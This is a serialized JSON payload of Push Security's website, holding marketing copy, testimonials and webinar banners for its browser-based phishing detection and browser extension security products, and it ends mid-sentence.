[{"data":1,"prerenderedAt":4643},["ShallowReactive",2],{"application-flags":3,"navbar":7,"always-visible-banner":95,"navbar-about-highlight":155,"navbar-resource-highlight":211,"use-case-page":256,"blog/installfix":1276},[4],{"name":5,"enabled":6},"maintenanceMode",false,[8,59,76],{"createdDate":9,"id":10,"name":11,"modelId":12,"published":13,"stageModifiedSincePublish":6,"query":14,"data":15,"variations":50,"lastUpdated":51,"firstPublished":52,"testRatio":33,"createdBy":53,"lastUpdatedBy":53,"folders":54,"meta":55,"rev":58},1742213002749,"efff2a27faf4408e9f908eba4b5542fe","inductive-automation","1c6207a5f24948ab82d4a0b17f251193","published",[],{"testimonial":16,"description":43,"type":19,"link":44,"title":47,"testimonialLink":48,"image":49},{"@type":17,"id":18,"model":19,"value":20},"@builder.io/core:Reference","f028f2b685bb47cd8bf9e82a26dd5a79","testimonial",{"query":21,"folders":22,"createdDate":23,"id":18,"name":24,"modelId":25,"published":13,"data":26,"variations":30,"lastUpdated":31,"firstPublished":32,"testRatio":33,"createdBy":34,"lastUpdatedBy":34,"meta":35,"rev":42},[],[],1735823466309,"We found Push to be more accurate when compared to competitors and the browser agent offered features that others couldn’t match.","42035571a56940ac98bff4544aa79aa5",{"author":27,"jobTitle":28,"quote":24,"image":29},"Jason Waits","\u003Cp>CISO at Inductive Automation\u003C/p>","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2Ff04c0c0689ce4a89ac0f0708d78c0a07",{},1735910703862,1735823501152,1,"ST0tXQM8slWpFrmioqKHmENB2qe2",{"kind":36,"lastPreviewUrl":37,"breakpoints":38,"hasAutosaves":41},"data","",{"small":39,"medium":40},640,768,true,"3v32gocrrqz","Join the industry's top security minds as they break down the browser attack landscape.",{"url":45,"text":46},"https://pushsecurity.com/webinar/state-of-browser-security","Save Your Spot","State of Browser Attacks Series","/customer-stories/inductive-automation","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2Fe94fca10aa7b46ac8052b7ea22de54cd",{},1776257019270,1742221533648,"CydmZnOWU1XuAaLhEDCoYNM4Z8W2",[],{"breakpoints":56,"kind":36,"lastPreviewUrl":37,"hasAutosaves":6},{"xsmall":57,"small":39,"medium":40},320,"motto9r9yg",{"createdDate":60,"id":61,"name":62,"modelId":12,"published":13,"query":63,"data":64,"variations":69,"lastUpdated":70,"firstPublished":71,"testRatio":33,"createdBy":53,"lastUpdatedBy":72,"folders":73,"meta":74,"rev":58},1742208588866,"1c7a4e423bf54ac1a328bb4063459ef2","Banner",[],{"type":65,"url":66,"text":67,"link":68},"web-banner","https://pushsecurity.com/resources/browser-attacks-report","Get our latest report analyzing browser attack techniques in 2026",{},{},1774258294825,1742208637545,"jKjF9r5jcvXU8tzZEfFQm31Iyvr2",[],{"kind":36,"lastPreviewUrl":37,"breakpoints":75,"hasAutosaves":41},{"xsmall":57,"small":39,"medium":40},{"createdDate":77,"id":78,"name":79,"modelId":12,"published":13,"stageModifiedSincePublish":6,"query":80,"data":81,"variations":89,"lastUpdated":90,"firstPublished":91,"testRatio":33,"createdBy":53,"lastUpdatedBy":53,"folders":92,"meta":93,"rev":58},1742208469288,"6763051b201f44a0838c6400c580ca67","Resource highlight",[],{"image":82,"type":83,"description":84,"link":85,"title":88},"https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F7b4a5ebf81d64e8c9d7fc35f6c96c4a9","resource","Learn about the latest techniques being used in the wild.",{"url":86,"text":87},"/resources/browser-attacks-report","Download now","Report: 2026 Browser Attack Techniques",{},1776255866789,1742208570400,[],{"kind":36,"lastPreviewUrl":37,"breakpoints":94,"hasAutosaves":6},{"xsmall":57,"small":39,"medium":40},{"createdDate":96,"id":97,"name":98,"modelId":99,"published":13,"query":100,"data":101,"variations":145,"lastUpdated":146,"firstPublished":147,"testRatio":33,"createdBy":34,"lastUpdatedBy":148,"folders":149,"meta":150,"rev":154},1774965361051,"fd266d0172cc47429be7ad10f48c99ad","always visible banner","0678d178ec8b41efb8a23c09dba7874d",[],{"ctaText":102,"text":103,"url":37,"blocks":104,"state":141},"ewrererw","testrfesssssssssss",[105,129],{"@type":106,"@version":107,"id":108,"component":109,"responsiveStyles":119},"@builder.io/sdk:Element",2,"builder-ca12c06a52de41d7b8743da53118cd38",{"name":110,"tag":110,"options":111,"isRSC":118},"TopBannerContent",{"text":112,"ctaText":46,"url":45,"mainText":113,"cta":116},"New Webinar Series: Join John Hammond, Troy Hunt, and Matt Johansen for the State of Browser Attacks",{"content":114,"fontSize":115},"\u003Cp>New Webinar Series: Join John Hammond, Troy Hunt, and Matt Johansen for the State of Browser Attacks\u003C/p>","text-base",{"content":117,"fontSize":115,"url":45},"\u003Cp>\u003Cstrong style=\"font-weight:700;\">Save Your Spot\u003C/strong>\u003C/p>\n",null,{"large":120},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"marginTop":126,"marginBottom":126,"fontSize":127,"fontWeight":128},"flex","column","relative","0","border-box",".56rem","1.125rem","700",{"id":130,"@type":106,"tagName":131,"properties":132,"responsiveStyles":136},"builder-pixel-08zrjigffq5t","img",{"src":133,"aria-hidden":134,"alt":37,"role":135,"width":124,"height":124},"https://cdn.builder.io/api/v1/pixel?apiKey=f3a1111ff5be48cdbb123cd9f5795a05","true","presentation",{"large":137},{"height":124,"width":124,"display":138,"opacity":124,"overflow":139,"pointerEvents":140},"block","hidden","none",{"deviceSize":142,"location":143},"large",{"path":37,"query":144},{},{},1775137295127,1774968080803,"ax7YYfD0OCeqT1Vxxv1G4FUbqVr1",[],{"breakpoints":151,"hasLinks":6,"kind":152,"lastPreviewUrl":153,"hasAutosaves":6},{"xsmall":57,"small":39,"medium":40},"component","https://pushsecurity.com/?builder.space=f3a1111ff5be48cdbb123cd9f5795a05&builder.user.permissions=read%2Ccreate%2Cpublish%2CeditCode%2CeditDesigns%2CeditLayouts%2CeditLayers%2CeditContentPriority%2CeditFolders%2CeditProjects%2CmodifyMcpServers%2CmodifyWorkflowIntegrations%2CmodifyProjectSettings%2CconnectCodeRepository%2CcreateProjects%2CindexDesignSystems%2CsendPullRequests%2CmergePullRequests&builder.user.role.name=Developer&builder.user.role.id=developer&builder.cachebust=true&builder.preview=always-visible-banner&builder.noCache=true&builder.allowTextEdit=true&__builder_editing__=true&builder.overrides.always-visible-banner=fd266d0172cc47429be7ad10f48c99ad&builder.overrides.fd266d0172cc47429be7ad10f48c99ad=fd266d0172cc47429be7ad10f48c99ad&builder.options.locale=Default","2lvuonnywj",[156,180],{"createdDate":157,"id":158,"name":159,"modelId":160,"published":13,"stageModifiedSincePublish":6,"query":161,"data":162,"variations":173,"lastUpdated":174,"firstPublished":175,"testRatio":33,"createdBy":53,"lastUpdatedBy":53,"folders":176,"meta":177,"rev":179},1776247359804,"9136a8f18b3b4a6ba29b8653a99372b1","testimonial-inductive-automation","20d9eaa352304613b3d1a794b400703d",[],{"link":163,"type":19,"testimonialLink":48,"testimonial":164},{},{"@type":17,"id":18,"model":19,"value":165},{"query":166,"folders":167,"createdDate":23,"id":18,"name":24,"modelId":25,"published":13,"data":168,"variations":169,"lastUpdated":31,"firstPublished":32,"testRatio":33,"createdBy":34,"lastUpdatedBy":34,"meta":170,"rev":172},[],[],{"author":27,"jobTitle":28,"quote":24,"image":29},{},{"kind":36,"lastPreviewUrl":37,"breakpoints":171,"hasAutosaves":41},{"small":39,"medium":40},"7t755zfvte3",{},1776247404986,1776247404973,[],{"breakpoints":178,"kind":36,"lastPreviewUrl":37,"hasAutosaves":6},{"xsmall":57,"small":39,"medium":40},"4moh0qpywtr",{"createdDate":181,"id":182,"name":88,"modelId":160,"published":13,"meta":183,"stageModifiedSincePublish":6,"query":185,"data":186,"variations":207,"lastUpdated":208,"firstPublished":209,"testRatio":33,"createdBy":53,"lastUpdatedBy":53,"folders":210,"rev":179},1776255761419,"05a9322735fc427db12e2740e4302300",{"breakpoints":184,"kind":36,"lastPreviewUrl":37,"hasAutosaves":6},{"xsmall":57,"small":39,"medium":40},[],{"testimonial":187,"link":206,"type":83,"title":88,"description":84,"image":82},{"@type":17,"id":188,"model":19,"value":189},"192acbb1f9ca4cac918c0ec435a8bae3",{"query":190,"folders":191,"createdDate":192,"id":188,"name":193,"modelId":25,"published":13,"data":194,"variations":200,"lastUpdated":201,"firstPublished":202,"testRatio":33,"createdBy":34,"lastUpdatedBy":53,"meta":203,"rev":205},[],[],1728981467463,"Push does for identity what CrowdStrike did for the endpoint",{"video":195,"jobTitle":196,"author":197,"qoute":37,"quote":198,"image":199},"https://cdn.builder.io/o/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F8b30e8ca50064058bbaef0f3c6164575%2Fcompressed?apiKey=f3a1111ff5be48cdbb123cd9f5795a05&token=8b30e8ca50064058bbaef0f3c6164575&alt=media&optimized=true","\u003Cp>Deputy CISO at Microsoft\u003C/p>\u003Cp>Former LinkedIn, Slack, Palantir\u003C/p>","Geoff Belknap","Push does for identity what CrowdStrike did for the endpoint.","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F748f0ad0a5064a00a13f4721fcc8dea1",{},1742902158597,1728981782923,{"kind":36,"lastPreviewUrl":37,"breakpoints":204,"hasAutosaves":41},{"small":39,"medium":40},"6s8ic0w0ao6",{"text":87,"url":86},{},1776255810913,1776255810900,[],[212,235],{"createdDate":213,"id":214,"name":88,"modelId":215,"published":13,"meta":216,"stageModifiedSincePublish":6,"query":218,"data":219,"variations":230,"lastUpdated":231,"firstPublished":232,"testRatio":33,"createdBy":53,"lastUpdatedBy":53,"folders":233,"rev":234},1776256900280,"1f429607996e4e5fae8fe3f9b9610e55","4829faa81e7c4ee8bd2d000e160e8d3c",{"breakpoints":217,"kind":36,"lastPreviewUrl":37,"hasAutosaves":6},{"xsmall":57,"small":39,"medium":40},[],{"testimonial":220,"link":229,"type":83,"title":88,"description":84,"image":82},{"@type":17,"id":188,"model":19,"value":221},{"query":222,"folders":223,"createdDate":192,"id":188,"name":193,"modelId":25,"published":13,"data":224,"variations":225,"lastUpdated":201,"firstPublished":202,"testRatio":33,"createdBy":34,"lastUpdatedBy":53,"meta":226,"rev":228},[],[],{"video":195,"jobTitle":196,"author":197,"qoute":37,"quote":198,"image":199},{},{"kind":36,"lastPreviewUrl":37,"breakpoints":227,"hasAutosaves":41},{"small":39,"medium":40},"r77qqueuo3j",{"text":87,"url":86},{},1776256937553,1776256937540,[],"q0jkez80wkg",{"createdDate":236,"id":237,"name":11,"modelId":215,"published":13,"stageModifiedSincePublish":6,"query":238,"data":239,"variations":250,"lastUpdated":251,"firstPublished":252,"testRatio":33,"createdBy":53,"lastUpdatedBy":53,"folders":253,"meta":254,"rev":234},1776256949234,"ce043785b71b4ece98eac811ecf4ba10",[],{"link":240,"type":19,"testimonial":241,"testimonialLink":48},{},{"@type":17,"id":18,"model":19,"value":242},{"query":243,"folders":244,"createdDate":23,"id":18,"name":24,"modelId":25,"published":13,"data":245,"variations":246,"lastUpdated":31,"firstPublished":32,"testRatio":33,"createdBy":34,"lastUpdatedBy":34,"meta":247,"rev":249},[],[],{"author":27,"jobTitle":28,"quote":24,"image":29},{},{"kind":36,"lastPreviewUrl":37,"breakpoints":248,"hasAutosaves":41},{"small":39,"medium":40},"mnaneamy308",{},1776256974140,1776256974130,[],{"breakpoints":255,"kind":36,"lastPreviewUrl":37,"hasAutosaves":6},{"xsmall":57,"small":39,"medium":40},[257,441,560,679,797,917,1037,1157],{"createdDate":258,"id":259,"name":260,"modelId":261,"published":13,"stageModifiedSincePublish":6,"query":262,"data":268,"variations":429,"lastUpdated":430,"firstPublished":431,"testRatio":33,"screenshot":432,"createdBy":34,"lastUpdatedBy":433,"folders":434,"meta":435,"rev":440},1744829487099,"387451215c314dd5bd654668cdc1a197","Zero-day phishing","cca4143377554c5a9163cc203a8ed2ba",[263],{"@type":264,"property":265,"operator":266,"value":267},"@builder.io/core:Query","urlPath","is","/uc/zero-day-phishing-protection",{"inputs":269,"customFonts":270,"seoTitle":318,"title":318,"tsCode":37,"seoDescription":319,"fontAwesomeIcon":320,"jsCode":37,"blocks":321,"url":267,"state":426},[],[271],{"family":272,"kind":273,"version":274,"lastModified":275,"files":276,"category":295,"menu":296,"subsets":297,"variants":300},"DM Sans","webfonts#webfont","v14","2023-07-13",{"100":277,"200":278,"300":279,"500":280,"600":281,"700":282,"800":283,"900":284,"800italic":285,"900italic":286,"700italic":287,"100italic":288,"italic":289,"regular":290,"200italic":291,"500italic":292,"300italic":293,"600italic":294},"https://fonts.gstatic.com/s/dmsans/v14/rP2tp2ywxg089UriI5-g4vlH9VoD8CmcqZG40F9JadbnoEwAop1hTmf3ZGMZpg.ttf","https://fonts.gstatic.com/s/dmsans/v14/rP2tp2ywxg089UriI5-g4vlH9VoD8CmcqZG40F9JadbnoEwAIpxhTmf3ZGMZpg.ttf","https://fonts.gstatic.com/s/dmsans/v14/rP2tp2ywxg089UriI5-g4vlH9VoD8CmcqZG40F9JadbnoEwA_JxhTmf3ZGMZpg.ttf","https://fonts.gstatic.com/s/dmsans/v14/rP2tp2ywxg089UriI5-g4vlH9VoD8CmcqZG40F9JadbnoEwAkJxhTmf3ZGMZpg.ttf","https://fonts.gstatic.com/s/dmsans/v14/rP2tp2ywxg089UriI5-g4vlH9VoD8CmcqZG40F9JadbnoEwAfJthTmf3ZGMZpg.ttf","https://fonts.gstatic.com/s/dmsans/v14/rP2tp2ywxg089UriI5-g4vlH9VoD8CmcqZG40F9JadbnoEwARZthTmf3ZGMZpg.ttf","https://fonts.gstatic.com/s/dmsans/v14/rP2tp2ywxg089UriI5-g4vlH9VoD8CmcqZG40F9JadbnoEwAIpthTmf3ZGMZpg.ttf","https://fonts.gstatic.com/s/dmsans/v14/rP2tp2ywxg089UriI5-g4vlH9VoD8CmcqZG40F9JadbnoEwAC5thTmf3ZGMZpg.ttf","https://fonts.gstatic.com/s/dmsans/v14/rP2rp2ywxg089UriCZaSExd86J3t9jz86Mvy4qCRAL19DksVat8JCm3zRmYJpso5.ttf","https://fonts.gstatic.com/s/dmsans/v14/rP2rp2ywxg089UriCZaSExd86J3t9jz86Mvy4qCRAL19DksVat8gCm3zRmYJpso5.ttf","https://fonts.gstatic.com/s/dmsans/v14/rP2rp2ywxg089UriCZaSExd86J3t9jz86Mvy4qCRAL19DksVat9uCm3zRmYJpso5.ttf","https://fonts.gstatic.com/s/dmsans/v14/rP2rp2ywxg089UriCZaSExd86J3t9jz86Mvy4qCRAL19DksVat-JDG3zRmYJpso5.ttf","https://fonts.gstatic.com/s/dmsans/v14/rP2rp2ywxg089UriCZaSExd86J3t9jz86Mvy4qCRAL19DksVat-JDW3zRmYJpso5.ttf","https://fonts.gstatic.com/s/dmsans/v14/rP2tp2ywxg089UriI5-g4vlH9VoD8CmcqZG40F9JadbnoEwAopxhTmf3ZGMZpg.ttf","https://fonts.gstatic.com/s/dmsans/v14/rP2rp2ywxg089UriCZaSExd86J3t9jz86Mvy4qCRAL19DksVat8JDW3zRmYJpso5.ttf","https://fonts.gstatic.com/s/dmsans/v14/rP2rp2ywxg089UriCZaSExd86J3t9jz86Mvy4qCRAL19DksVat-7DW3zRmYJpso5.ttf","https://fonts.gstatic.com/s/dmsans/v14/rP2rp2ywxg089UriCZaSExd86J3t9jz86Mvy4qCRAL19DksVat_XDW3zRmYJpso5.ttf","https://fonts.gstatic.com/s/dmsans/v14/rP2rp2ywxg089UriCZaSExd86J3t9jz86Mvy4qCRAL19DksVat9XCm3zRmYJpso5.ttf","sans-serif","https://fonts.gstatic.com/s/dmsans/v14/rP2tp2ywxg089UriI5-g4vlH9VoD8CmcqZG40F9JadbnoEwAopxRT23z.ttf",[298,299],"latin","latin-ext",[301,302,303,304,305,306,128,307,308,309,310,311,312,313,314,315,316,317],"100","200","300","regular","500","600","800","900","100italic","200italic","300italic","italic","500italic","600italic","700italic","800italic","900italic","Zero-day phishing protection","Detect phishing TTPs directly in the browser and stop credential theft.","faFishingRod",[322,421],{"@type":106,"@version":107,"tagName":323,"id":324,"children":325},"div","builder-76c6b8d1499346c7bc1fd56ae4e93638",[326,343,351,358,370,385,396,407,413],{"@type":106,"@version":107,"layerName":327,"id":328,"component":329,"responsiveStyles":340},"UseCaseHero","builder-5228fe062bef4a40a91e43f1112832fa",{"name":327,"options":330,"isRSC":118},{"title":318,"description":331,"points":332,"video":339},"\u003Cp>Push detects phishing as it happens. Autonomous agents hunt for new phishing techniques, identify kit signatures, and deploy detections within minutes of a new attack being analyzed. From cloned login pages to AiTM credential harvesting, Push sees what traditional filters miss and stops threats before they escalate.\u003C/p>",[333,335,337],{"item":334},"Detect phishing that bypasses traditional filters, including AiTM, SSO password theft, and fake login pages",{"item":336},"Stop never-before-seen attacks with AI-native behavioral and on-page analysis inside the browser",{"item":338},"Investigate faster with unified browser, user, and page context","https://cdn.builder.io/o/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F40433ceeb4f94b43a82e039a0f4fd411%2Fcompressed?apiKey=f3a1111ff5be48cdbb123cd9f5795a05&token=40433ceeb4f94b43a82e039a0f4fd411&alt=media&optimized=true",{"large":341},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"backgroundColor":342},"transparent",{"@type":106,"@version":107,"id":344,"component":345,"responsiveStyles":348},"builder-96634044407e491299e291ed64669e39",{"name":346,"options":347,"isRSC":118},"TrustedBy",{"AllPartners":41,"backgroundTransparent":6},{"large":349},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"backgroundColor":350},"#000",{"@type":106,"@version":107,"id":352,"component":353,"responsiveStyles":356},"builder-2c3768f930534557bb8978e32b6a6a0f",{"name":354,"options":355,"isRSC":118},"Diagonal",{"darkMode":41},{"large":357},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125},{"@type":106,"@version":107,"layerName":359,"id":360,"component":361,"responsiveStyles":368},"TextImageBlockVertical","builder-7c3c1c2840424db2ad2ccbfaf382dd64",{"name":359,"tag":359,"options":362,"isRSC":118},{"darkMode":6,"maxWidth":363,"maxTextWidth":364,"title":365,"description":366,"animatedTitle":37,"image":367,"reverse":6,"descriptionPaddingHorizontal":118},1200,800,"\u003Ch2>Why stop at the inbox?\u003C/h2>","\u003Cp>Phishing attacks have evolved. Whether attackers lure users with QR codes, instant messages, or OAuth consent screens, the outcome is the same: it plays out in the browser. Push gives you real-time detection for in-browser threats, stopping phishing and consent-based attacks before they lead to compromise\u003C/p>\u003Cp>\u003Cbr>\u003C/p>","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F7fdcac241f0e4a049166d7076858adeb",{"large":369},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125},{"@type":106,"@version":107,"id":371,"component":372,"responsiveStyles":380},"builder-41c978b3669749cf947e622b4e79e4d7",{"name":373,"options":374,"isRSC":118},"TextImageBlockHorizontal",{"darkMode":6,"maxWidth":363,"imageMaxWidth":375,"textPaddingTop":376,"title":377,"description":378,"reverse":41,"image":379},600,100,"\u003Cp>Detect phishing at the edge\u003C/p>","\u003Cp>Push uses industry-first telemetry to detect phishing based on behavior, not static indicators. Autonomous agents analyze how phishing pages behave and how users interact with them, uncovering fake logins, credential theft, and phishing kits the moment they load in the browser.\u003C/p>","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F9df3d180c97b4e61af142af2ccd68721",{"large":381},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"fontFamily":382,"paddingTop":383,"marginTop":384},"DM Sans, sans-serif","20px","0px",{"@type":106,"@version":107,"id":386,"component":387,"responsiveStyles":393},"builder-d2a7bc941feb43cdb898bc116b203cf9",{"name":373,"options":388,"isRSC":118},{"darkMode":6,"maxWidth":363,"imageMaxWidth":375,"textPaddingTop":389,"title":390,"description":391,"reverse":6,"image":392},120,"\u003Ch2>Go beyond blocklists and IOCs\u003C/h2>","\u003Cp>Push goes beyond URLs and easy-to-change indicators. It reads the full phishing playbook like script behavior, session hijacks, DOM changes, user inputs, then connects the dots in real time. This gives your team a complete picture of how the phishing attempt worked, not just an alert.\u003C/p>","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2Fabfd58db169b433e96d3f1261797156e",{"large":394},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"paddingTop":395},"36px",{"@type":106,"@version":107,"layerName":373,"id":397,"component":398,"responsiveStyles":404},"builder-42c32198083f4880acb37c5cb76934da",{"name":373,"options":399,"isRSC":118},{"darkMode":6,"maxWidth":363,"imageMaxWidth":375,"textPaddingTop":400,"title":401,"description":402,"reverse":41,"image":403},140,"\u003Ch2>Enhance your phishing response\u003C/h2>","\u003Cp>When phishing enters your environment, speed matters. Push gives you instant access to the telemetry that counts like session data, user behavior, and page activity, so you can investigate fast, trigger in-browser prompts, or forward alerts to your SIEM or SOAR for response. All in real time, right from the browser.\u003C/p>","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2Fbb195aec46904056b85e8688629e558e",{"large":405},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"paddingTop":406},"47px",{"@type":106,"@version":107,"id":408,"component":409,"responsiveStyles":411},"builder-9a95b9cbc4854421a92ef7b90f6c7adb",{"name":354,"options":410,"isRSC":118},{"darkMode":6},{"large":412},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125},{"@type":106,"@version":107,"id":414,"component":415,"responsiveStyles":419},"builder-0afa17a9f25c4661a90f314d5578aa18",{"name":416,"tag":416,"options":417,"isRSC":118},"LatestResources",{"sectionHeading":37,"customClass":418},"bg-black",{"large":420},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125},{"id":422,"@type":106,"tagName":131,"properties":423,"responsiveStyles":424},"builder-pixel-21yj6h3p4wh",{"src":133,"aria-hidden":134,"alt":37,"role":135,"width":124,"height":124},{"large":425},{"height":124,"width":124,"display":138,"opacity":124,"overflow":139,"pointerEvents":140},{"deviceSize":142,"location":427},{"path":37,"query":428},{},{},1776275046831,1745499158657,"https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2Fff60c30a8442489c8ed7e0af9599d14f","kYgMv6WsbvfmlOUYqR2SFwGzw6e2",[],{"lastPreviewUrl":436,"winningTest":118,"breakpoints":437,"kind":438,"hasLinks":6,"originalContentId":439,"hasAutosaves":6},"https://pushsecurity.com/uc/zero-day-phishing-protection?builder.space=f3a1111ff5be48cdbb123cd9f5795a05&builder.user.permissions=read%2Ccreate%2Cpublish%2CeditDesigns%2CeditLayouts%2CeditLayers%2CeditContentPriority%2CeditFolders%2CcreateProjects%2CsendPullRequests&builder.user.role.name=Designer&builder.user.role.id=creator&builder.cachebust=true&builder.preview=use-case-page&builder.noCache=true&builder.allowTextEdit=true&__builder_editing__=true&builder.overrides.use-case-page=387451215c314dd5bd654668cdc1a197&builder.overrides.387451215c314dd5bd654668cdc1a197=387451215c314dd5bd654668cdc1a197&builder.overrides.use-case-page:/uc/zero-day-phishing-protection=387451215c314dd5bd654668cdc1a197&builder.options.locale=Default",{"xsmall":57,"small":39,"medium":40},"page","2daa5670b8504fc7ba4700633e8bd921","atvz4dp24b7",{"createdDate":442,"id":443,"name":444,"modelId":261,"published":13,"stageModifiedSincePublish":6,"query":445,"data":448,"variations":552,"lastUpdated":553,"firstPublished":554,"testRatio":33,"screenshot":555,"createdBy":34,"lastUpdatedBy":433,"folders":556,"meta":557,"rev":440},1756833377777,"54f8256648f54d439303734b1e69221b","Browser extension security",[446],{"@type":264,"property":265,"operator":266,"value":447},"/uc/browser-extension-security",{"seoDescription":449,"jsCode":37,"fontAwesomeIcon":450,"tsCode":37,"title":444,"seoTitle":444,"customFonts":451,"inputs":456,"blocks":457,"url":447,"state":549},"Shine a light on risky browser extensions.","faPuzzlePiece",[452],{"kind":273,"family":272,"version":274,"files":453,"category":295,"lastModified":275,"subsets":454,"variants":455,"menu":296},{"100":277,"200":278,"300":279,"500":280,"600":281,"700":282,"800":283,"900":284,"100italic":288,"italic":289,"regular":290,"900italic":286,"800italic":285,"700italic":287,"200italic":291,"300italic":293,"500italic":292,"600italic":294},[298,299],[301,302,303,304,305,306,128,307,308,309,310,311,312,313,314,315,316,317],[],[458,544],{"@type":106,"@version":107,"tagName":323,"id":459,"meta":460,"children":461},"builder-71d0648c1d2f4ede8d0d0b5b28b7b94c",{"previousId":324},[462,478,485,492,501,511,521,531,538],{"@type":106,"@version":107,"id":463,"meta":464,"component":465,"responsiveStyles":476},"builder-ff325b4b8fad4edea53f38865947e854",{"previousId":328},{"name":327,"options":466,"isRSC":118},{"title":444,"description":467,"points":468,"video":475},"\u003Cp>Browser extensions introduce new code, new permissions, and new potential for risk. Many include AI features, and most go completely unnoticed. Push gives you full visibility into every extension used across your workforce, across major browsers, so you can uncover shadow IT, assess risky permissions, and block unsafe tools before they lead to compromise.\u003C/p>",[469,471,473],{"item":470},"Discover every browser extension in use",{"item":472},"Spot risky or unsanctioned behavior",{"item":474},"Make informed decisions on extension policy","https://cdn.builder.io/o/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2Fc538aad95d7f403aa3c3551af72f67c0?alt=media&token=1411fa6d-2eac-4e6c-94bf-ea117da12d67&apiKey=f3a1111ff5be48cdbb123cd9f5795a05",{"large":477},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"backgroundColor":342},{"@type":106,"@version":107,"id":479,"meta":480,"component":481,"responsiveStyles":483},"builder-fb89d128c64e47cf9cbb11d90fc24523",{"previousId":344},{"name":346,"options":482,"isRSC":118},{"AllPartners":41,"backgroundTransparent":6},{"large":484},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"backgroundColor":350},{"@type":106,"@version":107,"id":486,"meta":487,"component":488,"responsiveStyles":490},"builder-54388d35126c4d0096eeebaf8c4448cd",{"previousId":352},{"name":354,"options":489,"isRSC":118},{"darkMode":41},{"large":491},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125},{"@type":106,"@version":107,"layerName":359,"id":493,"component":494,"responsiveStyles":499},"builder-3c8fa6785dd6466abf52a2470d66d85a",{"name":359,"tag":359,"options":495,"isRSC":118},{"darkMode":6,"maxWidth":363,"maxTextWidth":364,"title":496,"description":497,"image":498,"reverse":6},"\u003Ch2>Take control of browser extensions\u003C/h2>","\u003Cp>Attackers are increasingly using malicious browser extensions to gain access to data processed and stored in the browser. And the problem is, most security teams have no visibility into what extensions are being used. Push changes that. With browser-native telemetry, the Push extension continuously inventories browser extensions across your environment, flags the risky ones, and gives you intelligence to act. \u003C/p>\u003Cp>\u003Cbr>\u003C/p>\u003Cp>\u003Cbr>\u003C/p>","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F0a004f16a6874f4c8fdf14344acc9fec",{"large":500},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125},{"@type":106,"@version":107,"id":502,"meta":503,"component":504,"responsiveStyles":509},"builder-93738f98109a4009affb349afd7bb182",{"previousId":371},{"name":373,"options":505,"isRSC":118},{"darkMode":6,"maxWidth":363,"imageMaxWidth":375,"textPaddingTop":376,"title":506,"description":507,"reverse":41,"image":508},"\u003Ch2>Discover every extension in use\u003C/h2>","\u003Cp>Push gives you structured, searchable data about every extension in your environment, so you’re not just seeing what’s there, but also understanding how it got there, what it can do, and who it affects. It’s the kind of granular insight that’s nearly impossible to get from traditional tools, and it lays the groundwork for better policy decisions and faster investigations.\u003C/p>","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F0e5727ca99474f14b1b7916bf6bbb782",{"large":510},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"fontFamily":382,"paddingTop":383,"marginTop":384},{"@type":106,"@version":107,"id":512,"meta":513,"component":514,"responsiveStyles":519},"builder-83393acb12ee4fdd840839185b51edb4",{"previousId":386},{"name":373,"options":515,"isRSC":118},{"darkMode":6,"maxWidth":363,"imageMaxWidth":375,"textPaddingTop":389,"title":516,"description":517,"reverse":6,"image":518},"\u003Ch2>Spot risky or malicious extensions\u003C/h2>","\u003Cp>Push highlights extensions with dangerous permissions, broad access, or poor reputations. This includes AI extensions that request access far beyond what their stated purpose requires. You can quickly detect sideloaded, manually installed, or development-mode extensions that bypass normal controls. And because Push shows you who’s using them and where, you can respond precisely and effectively.\u003C/p>","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2Fa104d58c8da34fbb8901f738fb21453b",{"large":520},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"paddingTop":395},{"@type":106,"@version":107,"layerName":373,"id":522,"meta":523,"component":524,"responsiveStyles":529},"builder-da98e3de949646d89c53a0d1c2784664",{"previousId":397},{"name":373,"options":525,"isRSC":118},{"darkMode":6,"maxWidth":363,"imageMaxWidth":375,"textPaddingTop":400,"title":526,"description":527,"reverse":41,"image":528},"\u003Ch2>Accelerate security reviews\u003C/h2>","\u003Cp>Most teams have extension policies, they just don’t have the data to enforce them. Push reveals how each extension entered your environment, whether it was installed manually, sideloaded, or deployed in dev mode. You’ll see which users are running what, and where, so you can surface violations, investigate quickly, and respond with 